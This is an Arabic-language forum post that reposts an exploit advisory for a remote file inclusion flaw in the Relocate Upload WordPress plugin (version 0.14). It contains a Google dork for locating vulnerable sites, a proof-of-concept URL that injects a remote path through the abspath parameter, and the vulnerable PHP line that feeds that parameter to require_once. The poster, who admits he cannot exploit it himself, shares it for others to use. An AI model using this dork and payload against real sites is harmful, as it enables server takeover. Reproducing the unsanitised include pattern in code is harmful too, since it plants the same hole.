ثغره في سكربت ورد برسس ريموت فايلن انكلود

[hank00sh]

السلام عليكم ورحمة الله وبركاته

اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات

شوفت ثغرات جديده كلها في الورد برسس

ومنها هذي الثغره

كود PHP:

# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
 
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       // WP setup and function access
        define('WP_USE_THEMES', false);
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter 


طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي

بس يارب الثغره تعجبكم

تحياتي لكم